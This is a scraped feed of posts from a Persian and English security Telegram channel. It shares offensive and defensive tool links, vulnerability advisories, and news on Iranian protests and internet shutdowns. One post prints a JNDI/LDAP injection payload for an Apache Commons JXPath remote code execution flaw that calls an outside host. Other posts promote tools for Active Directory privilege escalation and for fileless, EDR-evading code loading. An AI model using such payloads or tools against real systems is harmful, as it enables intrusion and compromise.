⭕️Autobloody
https://github.com/CravateRouge/autobloody
#ad #bloodhound
@securation
Automatically exploit Active Directory privilege escalation paths shown by BloodHound combining pathgen.py and autobloody.py.
Here is the list of the BloodHound edges currently supported for automatic exploitation:
MemberOf
ForceChangePassword
AddMembers
AddSelf
DCSync
GetChanges/GetChangesAll
GenericAll
WriteDacl
GenericWrite
WriteOwner
Owns
Contains
AllExtendedRightshttps://github.com/CravateRouge/autobloody
#ad #bloodhound
@securation
👍4👎1
Forwarded from NetBlocks
⚠️ Confirmed: Real-time network data show a near-total disruption to internet connectivity in #Sanandaj, the capital of Kurdistan Province in west #Iran; the incident comes amid widening protests over the death of #MahsaAmini after her arrest by morality police 📉
😢13❤1
⭕️awslabs-aws-security-assessment-solution
An AWS tool to help you create a point in time assessment of your AWS account using Prowler and Scout as well as optional AWS developed ransomware checks.
https://github.com/awslabs/aws-security-assessment-solution
#aws #security
@securation
An AWS tool to help you create a point in time assessment of your AWS account using Prowler and Scout as well as optional AWS developed ransomware checks.
https://github.com/awslabs/aws-security-assessment-solution
#aws #security
@securation
👍4👎1
⭕️ بعد از اعلام هکرهای Anonymous برای حمله سایبری در توییتر , حملات DDOS متعددی روی سرویس های دولتی راه انداخته و سرویس ها از دسترس خارج شده اند.
#ddos #anonymous #hackers
@securation
#ddos #anonymous #hackers
@securation
👍51👎11😁4❤3🔥3😢2🤩1
⭕️Fileless Remote PE
Loading Fileless Remote PE from URI to memory with argument passing and ETW patching and NTDLL unhooking and No New Thread technique
https://github.com/D1rkMtr/FilelessRemotePE
#evasion #fileless #PE
@securation
Loading Fileless Remote PE from URI to memory with argument passing and ETW patching and NTDLL unhooking and No New Thread technique
https://github.com/D1rkMtr/FilelessRemotePE
#evasion #fileless #PE
@securation
👍1
⭕️ SSRF filter bypass in Nextcloud
فیلتر SSRF اعمال شده اندپوینت و آدرس مربوط به Alibaba metadata و google cloud metadata رو چک نمیکنه.
https://hackerone.com/reports/1608039
#SSRF #Nexcloud
@securation
فیلتر SSRF اعمال شده اندپوینت و آدرس مربوط به Alibaba metadata و google cloud metadata رو چک نمیکنه.
https://hackerone.com/reports/1608039
#SSRF #Nexcloud
@securation
HackerOne
Nextcloud disclosed on HackerOne: SSRF via potential filter bypass...
Security advisory at https://github.com/nextcloud/security-advisories/security/advisories/GHSA-rmf9-w497-8cq8
❤5👍3
⭕️ اون زمانی که تهدید شدیم به اینکه :
اکانت ها و VPS های فیلترشکن هاتون رو کجای خونتون قایم کردی؟!
گفتیم توی CD/DVD بود شکستیم.
البته امروزه فیلترشکن که دیگه عادی تره تازه !
یه زمانی میومدن تهدید میکردن که هرکسی از پروتکل SSL برای سایت ها استفاده کنه مجرم هست.
میگفتیم مشکلش چیه وقتی داریم امنیت سرویس رو بالا میبریم؟
میگفتن :
ما نمیدونیم این پروتکل چیه ، ولی دشمن اینو طراحی کرده که اطلاعات رمزنگاری شده رد و بدل بشن!
بقیه اش خودتون متوجه شدین قطعا :)
@securation
اکانت ها و VPS های فیلترشکن هاتون رو کجای خونتون قایم کردی؟!
گفتیم توی CD/DVD بود شکستیم.
البته امروزه فیلترشکن که دیگه عادی تره تازه !
یه زمانی میومدن تهدید میکردن که هرکسی از پروتکل SSL برای سایت ها استفاده کنه مجرم هست.
میگفتیم مشکلش چیه وقتی داریم امنیت سرویس رو بالا میبریم؟
میگفتن :
ما نمیدونیم این پروتکل چیه ، ولی دشمن اینو طراحی کرده که اطلاعات رمزنگاری شده رد و بدل بشن!
بقیه اش خودتون متوجه شدین قطعا :)
@securation
👍61😁15👎3😢3❤1🤩1
⭕️ طبق گفته ی خبرگزاری CNN ، بایدن به آقا ایلان گفته که ازت حمایت میکنیم بابت اینترنت ماهواره ای که به مردم شریف ایران میدید.
گفته هزینه های این کار رو برای مردم کاهش میده و هرگونه حمایت نیاز باشه انجام میدیم.
حالا فعلا مشخص نیست چطور اینکارو میکنه و هزینه ها رو چطوری میخواد کاهش بده ، ولی خب نابغه ی مغروری مثل ایلان ماسک قطعا قدرت خودش رو به رخ استاد روح الله مومن نسب و تمام مُریدانِ این طرح امنیتی #صیانت و تمام خاک خورده های قرن دوم میلادی نشون میده.
https://edition.cnn.com/2022/10/21/politics/white-house-musk-starlink-iran-protests-ukraine/index.html
#صیانت #ایلان_ماسک
@securation
گفته هزینه های این کار رو برای مردم کاهش میده و هرگونه حمایت نیاز باشه انجام میدیم.
حالا فعلا مشخص نیست چطور اینکارو میکنه و هزینه ها رو چطوری میخواد کاهش بده ، ولی خب نابغه ی مغروری مثل ایلان ماسک قطعا قدرت خودش رو به رخ استاد روح الله مومن نسب و تمام مُریدانِ این طرح امنیتی #صیانت و تمام خاک خورده های قرن دوم میلادی نشون میده.
https://edition.cnn.com/2022/10/21/politics/white-house-musk-starlink-iran-protests-ukraine/index.html
#صیانت #ایلان_ماسک
@securation
CNN
CNN Exclusive: After Ukraine, Biden administration turns to Musk’s satellite internet for Iran | CNN Politics
The White House has engaged in talks with Elon Musk about the possibility of setting up SpaceX’s satellite internet service Starlink inside Iran, multiple officials familiar with the discussions told CNN.
👍28👎10❤4🤩2😁1
⭕️Apache Commons Jxpath (
Payload:
https://github.com/Warxim/CVE-2022-41852
Research:
https://hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852/
#apache #jxpath #exploit
@securation
CVE-2022-41852)Payload:
jxPathContext.getValue("javax.naming.InitialContext.doLookup(\"ldap://check.dnslog.cn/obj\")");
PoC:https://github.com/Warxim/CVE-2022-41852
Research:
https://hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852/
#apache #jxpath #exploit
@securation
👍4
❤14👎9👍6😢2😁1
⭕️ Triggering RCE in the Samsung Galaxy phones via Galaxy Store Vulnerability
آسیب پذیری پیدا شده در Galaxy Store اجازه RCE توسط حمله کننده در تلفن همراه را می دهد.
این آسیب پذیری از طریق deeplink هندل شده نا امن رخ می دهد که به موجب آن حمله کننده قادر به اجرای کد JS در webview می شود. deeplink ها می توانند توسط اپلیکیشن های دیگر یا مرورگر فراخوانی شوند. Galaxy Store نیز هنگام دریافت deeplink مرتبط با خودش
https://ssd-disclosure.com/ssd-advisory-galaxy-store-applications-installation-launching-without-user-interaction/
#galaxy #store #rce
@securation
آسیب پذیری پیدا شده در Galaxy Store اجازه RCE توسط حمله کننده در تلفن همراه را می دهد.
این آسیب پذیری از طریق deeplink هندل شده نا امن رخ می دهد که به موجب آن حمله کننده قادر به اجرای کد JS در webview می شود. deeplink ها می توانند توسط اپلیکیشن های دیگر یا مرورگر فراخوانی شوند. Galaxy Store نیز هنگام دریافت deeplink مرتبط با خودش
//:samsungapps آن را پردازش و از طریق webview نمایش می دهد.https://ssd-disclosure.com/ssd-advisory-galaxy-store-applications-installation-launching-without-user-interaction/
#galaxy #store #rce
@securation
SSD Secure Disclosure
SSD Advisory – Galaxy Store Applications Installation/Launching without User Interaction - SSD Secure Disclosure
A vulnerability in the Galaxy Store allows attackers through an XSS to cause the store to install and/or launch an application, allowing remote attackers to trigger a remote command execution in the phone.
👍17
⭕️ شرکت آروان کلود و پرس تی وی در لیست تحریم های اروپا قرار گرفتند.
لیست و جزییات کامل :
https://eur-lex.europa.eu/legal-content/EN/TXT/PDF/?uri=OJ:L:2022:293I:FULL&from=EN
@securation
لیست و جزییات کامل :
https://eur-lex.europa.eu/legal-content/EN/TXT/PDF/?uri=OJ:L:2022:293I:FULL&from=EN
@securation
👍30🎉11👎7
⭕️ناتو خود را برای یک "جنگ سایبری" آماده میکند.
حدود 150 کارشناس امنیت سایبری ناتو این هفته در استونی گردهم آمدند تا برای شبیهسازی مقابله با یک جنگ سایبری تمام عیار آماده شوند
https://www.politico.com/news/2022/12/03/nato-future-cyber-war-00072060
#cyberwar
@securation
حدود 150 کارشناس امنیت سایبری ناتو این هفته در استونی گردهم آمدند تا برای شبیهسازی مقابله با یک جنگ سایبری تمام عیار آماده شوند
https://www.politico.com/news/2022/12/03/nato-future-cyber-war-00072060
#cyberwar
@securation
🤩39😁6👍5😱5